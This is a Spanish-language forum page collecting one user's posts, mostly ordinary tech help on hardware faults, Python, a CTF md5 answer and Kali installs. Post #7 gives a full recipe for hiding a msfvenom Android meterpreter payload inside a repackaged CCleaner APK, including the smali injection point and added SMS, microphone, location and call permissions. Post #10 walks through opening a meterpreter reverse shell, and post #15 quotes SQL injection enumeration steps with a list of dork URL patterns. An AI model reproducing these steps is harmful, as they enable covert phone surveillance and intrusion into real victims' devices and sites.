Menú

Mostrar Mensajes

Esta sección te permite ver todos los mensajes escritos por este usuario. Ten en cuenta que sólo puedes ver los mensajes escritos en zonas a las que tienes acceso en este momento.

Mostrar Mensajes Menú

Mensajes - lunix.bo

#1
Hola como va....

Tienes el archivo q te llego por imbox?????
Si lo tienes puedes hacerle ingenieria inversa, ahi podras darte una idea de q APIs esta usando para poder lograr mandar multiples mensajes, pero hasta donde se pagas por el API y solo te funciona un limitado tiempo luego tenes q pagar de nuevo, es un servicio q ofrece facebook.

Saludos
#2
Hola como Va....

segun lo q lei no solo te da el pantallazo azul si no q tb pierdes informacion (archivos huerfanos) y los codigo de error varian en cada reinicio q te da, me hace recuerdo a PCs q tienen mal la fuente de poder te recomiendo q pruebes con otra fuente de poder.

Yo pienso q eso soluciona tu problema. Saludos
#3
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Hola, estoy en el mismo caso o parecido, pero tengo un problema.
Meto ipconfig y me da la puerta de enlace predeterminada, pero la introduzco en el navegador y me da error, Firefox no puede establecer una conexión con el servidor...
Alguien que me de algo de luz para ver lo que está pasando¿? Gracias.

Lanza un nmap a esa IP para ver si tiene algún puerto de administración abierto.

Un saludo.
Demasiado difícil para mí

Enviado desde mi SM-G900F mediante Tapatalk

Sabes nmap es una herramienta basica para todos (te puede servir para encontrar intrusos en tu red wireless) existe bastante documentacion al respecto, en youtube estan con narracion o sin narracion, te aconsejo q le des una mirada.

NO ES PARA NADA DIFICIL, he visto muchachos de 12 manejarlo a la perfeccion, tambien recordarte q el limite te lo pones tu.......

Saludos




#4
Dudas y pedidos generales / Re:Eliminar elemento
Enero 29, 2018, 03:36:32 AM
Mira no entiendo bien lo q pretendes realizar pero te digo hay errores en tu codigo, si pudieras subir todo tu codigo o el fin de tu problema estaria perfecto..........
#5
Dudas y pedidos generales / Re:Sistema Operativo
Enero 29, 2018, 03:22:22 AM
Bueno como te decia seria bueno algunas imagenes, estoy suponiendo q tienes los 2 disco funcionando en una sola computadora y q cambiaste el orden de los mismos, al volverlos a su lugar te empezo a fallar, podes revisar las conexiones sata (si es tu caso), tambien revisas el inicio de arranque de los dispositivos (en algunos equipos entras con F9).

Pero si solo tenes un disco trabajando y los cambiaste momentaneamente y ahora no da tu kali, bueno primero te pregunto donde guardaste el disco 2 mientras trabajabas con el disco 1, si lo dejaste sobre cualquier material parecido al papel (periodicos, cuadernos, revistas, o incluso sobre superficies de madera) puede q le pasaras electrostatica al dispositivo. Tambien puede q hicieras movimientos bruscos con el disco o en su defecto, aunque pasa casi nunca, al volver a iniciar el flujo de corriente en el dispositivo este perdio algunos archivos del arranque, ya q son practicamente los primeros en ejecutarse

Todo esto te lo digo especulando con la informacion q proporcionaste
Espero te sirva bro
#6
Dudas y pedidos generales / Re:Sistema Operativo
Enero 28, 2018, 06:13:02 PM
Seria bueno q subas algunas imagenes

Pero parce q fuera problema de Master Device, puedes revisar cual es el q se esta iniciando primero......
#7
hola te resumo esto q encontre:
Para empezar generamos el payload para Android con msf:
Código: php
msfvenom -p android/meterpreter/Payload_Type LHOST=IP_Address LPORT=Incoming_Port -o meterpreter.apk

Nos descargamos una apk legitima como ccleaner y decompilamos las dos con apktool:
Código: php
apktool d –f –o payload meterpeter.apk

Código: php
apktool d –f –o original ccleaner.apk


Copiamos la carpeta metasploit desde /payload/smali/com/metasploit a /original/smali/com/piriform
Nos vamos la carpeta ./original/ y editamos AndroidManifest.xml

Buscamos las líneas siguientes que nos servirán como guía para encontrar la ruta a la aplicación principal que es la que nosotros queremos modificar:

<action android:name="android.intent.action.MAIN"/>
<category android:name="android.intent.category.LAUNCHER"/>

Encima de estas, encapsulándolas habrá una etiqueta <activity
Nos fijamos en la propiedad Android:name= de esta etiqueta que tendrá una estructura similar a "com.piriform.ccleaner.ui.activity.MainActivity"

Por tanto, ya sabemos el fichero que tenemos que editar de nuestra app legitima (dentro de ./original/smali/), nos vamos a este fichero que será algo parecido a "com/piriform/ccleaner/ui/activity/MainActivity.smali" , es decir, por cada "." Será una "/".

Editamos este fichero .smali y buscamos la línea:

Código: php
;->onCreate(Landroid/os/Bundle;)V


En la siguiente línea a esta ponemos:

Código: php
invoke-static {p0}, Lcom/metasploit/stage/Payload;->start(Landroid/content/Context;)V


Donde le indicamos que invoque nuestra app que en este caso es el Payload de msf y después continúe con la ejecución normal de la app legitima

Ahora vamos a añadir más permisos a esta app de los que tiene, nos vamos dentro del directorio de la aplicación ./original/ y modificamos el AndoridManifest.xml
Añadiremos los permisos que consideremos, en mi caso puse estos:

Código: php
<uses-permission android:name="android.permission.ACCESS_COURSE_LOCATION"/>
<uses-permission android:name="android.permission.CHANGE_WIFI_STATE"/>
<uses-permission android:name="android.permission.ACCESS_FINE_LOCATION"/>
<uses-permission android:name="android.permission.SEND_SMS"/>
<uses-permission android:name="android.permission.RECEIVE_SMS"/>
<uses-permission android:name="android.permission.RECORD_AUDIO"/>
<uses-permission android:name="android.permission.CALL_PHONE"/>


ahora vamos a recompilar otra vez la app, hacemos:

Código: php
apktool b original/


Consejos:
Si vas a descargar ccleaner como en el ejemplo, no descargues la ultima version de este pues modificaron los archivos de MainActivity(al parecer ya vieron este manual ;D ;D)

#8
Dudas y pedidos generales / Re:Magic Number
Enero 25, 2018, 10:16:21 PM
Bueno yo pase ese reto no hace mucho, y revisando y/o haciendo memoria la respuesta es esa q escribi mas arriba, pues a mi me funciono bien y hablito la siguiente pregunta. ;D ;D

CitarYo ya he intentado todo lo que ustedes dicen y sigue sin funcionar.

00 00 00 18 66 74 79 70 6d 70 34 32

¿Qué hay que hacer con ese número hexadecimal? He probado a pasarlo directamente a md5, con mayúsculas y minúscula, con espacios y sin espacios y no hay manera de encontrar la solución correcta.

sabes ya encontre tu error, el primer numero fuera de los ceros es 20 no 18 la respuesta de arriba esta mal; me guie en los numeros q pusiste en tu pregunta q tambien estan mal.
Prueba cambiando ese numero y te da........ ;)
#9
Dudas y pedidos generales / Re:Magic Number
Enero 24, 2018, 10:26:26 AM
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Es en mayúsculas y sin espacios.

Un saludo.
Lo primer mil gracias por la ayuda. Lo segundo disculparme porque seguro que es una tonteria en lo que estoy fallando. Pero siguiendo lo que has dicho el magic number seria:
00000018667479706D703432
Cuyo md5 seria:
7562ae15c322134c0a7c7ebbdbb2ac0f
Pero la respuesta flag{md5} con esta respuesta me sigue siendo incorrecta.
Un saludo y gracias por adelantado

no esta bien tu md5:
Código: php
echo 00000018667479706D703432 | md5sum

ejecutando ese codigo resulta:

5de2fead2232b414d5d635d6b1c0fe3b

no recuerdo bien los retos basicos de ATENEA pero si estan "pataleando" con esto........
deberian seguir los textos q recomiendan en esa plataforma, son buenisimos

un saludo
#10
Para abrir una shell:
Código: php
set payload windows/meterpreter/reverse_tcp

luego
Código: php
show options

tienes q visualizar las opciones de "Payload options (windows/meterpreter/reverse_tcp):" que tiene q ser igual a tu pdf.
luego (aqui empieza tu imagen)
Código: php
exploit

va correr las primeras 7 lineas de tu imagen y vuelve al handler
luego
Código: php
sessions -i 1

con eso deberias posicionarte en meterpreter, escribes "help"
luego
Código: php
shell

y listo ya tienes la shell en tu terminal

#11
Primero que nada no se entiente bien tu pregunta, asi q voy a tratar de responder deacuerdo a lo q veo en tu imagen. Si estas trabajando con un solo objetivo (WinXP en VM) no deberias tener 4 sesiones esperando conexion, para estar recien empezando te puede confundir. O si estas explotando mas de una vulnerabilidad usa "-j" para moverte a una sesion especifica.  Ahora usa "run" en lugar de "shell", tambien te aconsejo q revises desde el principio tanto tu explotacion como la documentacion que esta tiene.

Saludos...............
#12
Si desarrollas exploits del tipo "ZERO-DAY" tendras trabajo bien remunerado!!!!!!!! ;D ;D

Saludos ......
#13
Bueno primero te digo como experiencia con el iso 2017/1, descargo toda la noche, pero a la hora de la verdad no quiso instalar el grub, tuve q descargar de nuevo el iso y funciono perfecto, ahora hace unos dias me disponia a reinstalar mi sistema opretivo y decidi descargar el iso 2017/3 y no quiso instalar el sistema, una huevada, tengo q volver a descargar la iso pero como me da pereza esperar otra noche volvi a instalar la iso 2017/1 y esperar a q salga 2018 ;D ;D ;D ;D

En resumen tu iso puede estar corrupta aunque la descarga sea de No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
#14
Dudas y pedidos generales / Re:Eliminar elemento
Enero 06, 2018, 08:08:23 PM
He intentado mantener tu ejemplo espero te sirva bro.......
Código: php
def tamanio():
k=int(input("Ingrese valor"))
return k
def vector(x,y,k):
n=[1]   # Asigno un valor de entrada a la lista
a=x,y,k
for i in a:
n.append(i)
return n
def eliminacion(r,e):
r.remove(e)
print r
def mostrar(x):
print(x)

x=tamanio()
y=tamanio()
k=tamanio()
r=vector(x,y,k)
print("Mostrar vector")
mostrar(r)
print("Ingrese un numero a eliminar")
e=tamanio()
eliminacion(r,e)
print("Mostrar vector ya eliminado")
mostrar(e)


#15
bueno aqui esta parte del post q estas leyendo, q por el contexto de tu pregunta me imagino no comprendiste bien.........

CitarSupongamos que en este caso la consulta interna que se realiza es esta:
Código: php
Select * from noticias where id=13

está completamente equilibrada no hay caracteres de más por lo cual funciona, pero si agregamos la comilla simple quedaría de la siguiente forma:
Código: php
Select * from noticias where id=13'

por lo que se desequilibra y generara el error pues bien para explotar esta vulnerabilidad en este tipo de consulta no necesitamos ni de la comilla simple (') ni de comentarios ya que desequilibraría la consulta, bueno lo primero que tendríamos que hacer sería buscar el número de columnas que tiene la tabla noticias para ello hacemos uso del comando SQL "Order By":
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta Order BY 1 ordena la primera columna(aparece bien la página)
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta Order BY 2 ordena la segunda columna(aparece bien la página)
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta Order BY 3 ordena la tercera columna(aparece bien la página)
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta Order BY 4 ordena la cuarta columna(aparece bien la página)
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta Order BY 5 ordena la quinta columna al no existir una quinta columna devuelve error
con esto sabemos que el número de columnas es 4

para realizar la inyeccion sql se debe seguir un formato de url:

addToCart.php?idProduct=
addtomylist.php?ProdId=
adminEditProductFields.php?intProdID=
advSearch_h.php?idCategory=
affiliate.php?ID=
affiliate-agreement.cfm?storeid=
index.php?include=
index.php?open=
index.php?visualizar=
index.php?pagina=

como te daras cuenta todos estos dorcks tienen algo en comun, un signo de igual (=) el cual indica q se esta realizando una consulta y por ende es susceptible a inyeccion sql.
se te fijas la direccion web q intentas vulnerar (No tienes permitido ver los links. Registrarse o Entrar a mi cuenta BY 1 o  No tienes permitido ver los links. Registrarse o Entrar a mi cuenta) ninguna cumple con lo q te mencione mas antes.............

concuerdo con q aprendas primero php para luego intertar hacer este tipo de pruebas.